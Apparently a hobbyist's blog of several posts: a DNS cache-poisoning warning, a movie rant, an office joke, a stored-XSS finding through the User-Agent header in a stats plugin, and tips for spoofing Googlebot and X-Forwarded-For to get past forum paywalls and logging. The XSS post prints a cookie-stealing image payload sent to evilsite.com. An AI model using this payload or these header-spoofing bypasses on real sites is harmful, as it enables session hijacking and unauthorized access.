K World

Guess you know what is DNS ?
If you don’t know what it is …
Its Domain Name System. All the servers will have some set of numbers to identify them (IP), to recognize them easily we give them a name (domain name) and for internet to work, DNS maps these names to numbers. (Duh, read wikipedia for more info)

For the techie folks who know whats DNS, you might have missed this news. There was a bug. It was just a bug when people din’t know. Few days before , its was a problem as bad people know that it exists. And couple of days before, it became a major problem as bad people got to know how to tame the bug and exploit it. And today, its frigging Pain in the A** as our dumb ISPs are not fixing their DNS servers.

Well, the bug is that bad people can manipulate DNS lookups. Which literally means, when you open Google.com, then can send you to Yahoo.com too. Search engines need not be a problem, but if they manipulate DNS of a bank … the answer is … somebody is gonna get hurt real badddddd

So, I request you to check (@Doxpara) whether your DNS server is vulnerable to such bug or not, and if it is, change it to OpenDNS (208.67.222.222 and 208.67.220.220) and stay secure. As of today, I’ve tested BSNL and Airtel DNS servers (Chennai) and both of them are vulnerable. Guess, we need to take a huge rod and shove it up into someone’s a** and make them fix their DNS servers so that we can stay secure.

For extra-super-terrestial technical folks, I need not tell you about this, but incase you missed it, check (@Securebits) the exploiter released.

As usualy, after watching a movie, rather than going back to my normal life, I started to analyze it. This time the analysis was even more as the movie is one of the worse I’ve ever seen. Even after watching Rajeev Masand’s review on CNN-IBN, where he clearly told that movie sux, I shouldn’t have watched it. But after watching it, I understood that the movie was not just crap but a very crappy copy of great movies I’ve seen.

First half is in 2008 where the movie sucked, even then I could withstand. It started to suck more when the hero reaches 2050 and where I could see buildings, cars, robots copied from some hollywood flicks but shown in a very intolerable way. One Darthvader type of a guy who does Shivaji’s Motte Boss type of sound on his head and uses force to do some kind of blasts through his hands after a dance and his guys with Laser Guns and Tube Lights in their hands (Well, tube lights are supposed to look like Light Sabers) A Robot which tries to be part of iRobot, and one annoying teddy bear. Even if you manage to withstand all of them, the hero is a big problem as he tries to be a copy of Hrithik.

After that movie, I wanted to try my vision of future and it ended up very bad. I guess that flop movie had better future than my thoughts. Anyway, later I renamed it from my future to a present alien planet or how about an ant colony ? If the background doesn’t suit, how about Colony of IT ants which work on computers ? Ah nvm, I’m freezing the name to Alien Planet. I know that its very crude, but come on, its an alien planet and none of us know how it would look as of now

A shocking revealation. A good friend of mine was hiding some thing from us from long time and he revealed it finally in his blog post. This image will make it straight forward for you guys to understand what he was hiding from us.

Yes, I was as surprised as you guys are when I came to know this truth. But, I ‘was’ happy to know that he was doing something what he loved from his childhood. He followed his force and became what he wanted to become.

But, being a guy who sits next to him through out the day at work, I wanted to see his light saber skills. I was astonished by his skills when I saw them. Later I had to accept that he is far better in coding skills than his saber skills. Well, you need to know the shocking reason.

This is ME after the exhibition of his skills.

I request you all to sign this post as a petition for him to stop being a Jedi. Yoda, if  you are reading this post. Please, leave the Jedi council, ask him, you must.

Well, its just not funny way, but very funny way. Neither through a HTTP GET nor a HTTP POST. But, it’s through a header. I haven’t read about this method of XSS up to now, but seriously, its silly and common. Usually webmasters read about the traffic of their websites and Referrer, User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care about looking at your stats (especially in wordpress). One can rather keeping an alert, can keep some thing like this

<img
src=”javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;”
style=visibility:hidden />

The above code will send the cookie to cookie.php page of evilsite.com and the hacker can collect the cookies there using a very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use, so, if you really know what you have to do, you must be knowing this page already.

Result, check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it ?”

A funny feature (or mod) in vBulletin Boards, possibly in other message board scripts too. Have you ever faced this kind of situation ?

1. You need to download something
2. You search in Google and you get some relevant results
3. You click on that and you go to that site
4. You see that the content (or the link to the download) which you needed is not shown instead a message like “This part of the post is available only to registered users” is shown.

I’ve faced that situation. These days, many message boards are coming up with a feature named “Premium Content” which would be available only to registered users. But, in order to get traffic from search engines, those coders are giving an option to let search engines index the premium content. That is the reason why you see the snippet of the content in Google but not when you go to that site.

Here is the tip. Either try to read in the Google cache or become Google Yourself !!! How would you become Google ? Answer is simple, spoof your User-agent to Google. These boards do nothing more than checking your headers.

In firefox, download an extension like User Agent Switcher or Modify Headers and change your user-agent to “Googlebot/2.1 (+http://www.googlebot.com/bot.html)” and this would make the site think that You are Google.

In firefox, there is another option. In address bar type “about:config”, create a new string named “general.useragent.override” and set the value to “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”. Don’t forget all the values without quotes. And this method broke my Gmail as it stops loading Javascript thinking that I’m really incompatible. So, avoid this.

If you use IE, you better switch to firefox for happy browsing. But, if you don’t want to switch and still want my tip, yeah, open registry editor and do whatever you want at
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent

After doing this, just check whether your settings are fine or not @ UserAgent.org. If you want to try something different, telnet to the host on port number 80, and spoof those headers yourself.

Instead doing all this, you can prove that you are very boring by either registering at that site or go check whether there are any working entries at BugMeNot.com, login and read the required information.

BTW, yet another tip which might be useful. An “X-Forwarded-For” header will make the server think that you are a proxy server for the IP address in the value field of that header. In simple words, an IP address like “72.14.2o7.99″ in “X-forwarded-For” header might make the server think that you are a proxy for “72.14.2o7.99″ and save that IP in the log instead of yours. A stupid site like Rediff will give you it’s Rediff Abroad Page thinking that it’s so intelligent to grab your real location using that header because 72.14.2o7.99 is IP address of Google, location is Ca, USA.

Have Fun. Happy Spoofing